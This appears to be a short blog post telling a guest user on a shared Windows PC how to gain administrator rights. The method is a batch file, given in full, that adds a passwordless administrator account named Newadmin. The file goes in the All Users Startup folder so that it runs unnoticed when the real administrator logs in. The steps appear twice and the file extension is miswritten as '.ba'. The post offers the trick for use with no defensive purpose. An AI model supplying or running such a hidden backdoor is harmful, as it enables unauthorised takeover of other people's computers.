Its really easy to Create Admin Account.
Just go to guest account of that pc and create one administrator account instantly just by following this steps :
1.Open Notepad, paste the following :
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin
2.Save as Anything.ba
3. Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup
4.And when your admin logs into the system, the new account will be automatically created without the notice of the user. Next time when you login, you will get the user account for you.
Just go to guest account of that pc and create one administrator account instantly just by following this steps :
1.Open Notepad, paste the following :
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin
2.Save as Anything.ba
3. Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup
4.And when your admin logs into the system, the new account will be automatically created without the notice of the user. Next time when you login, you will get the user account for you.
No comments:
Post a Comment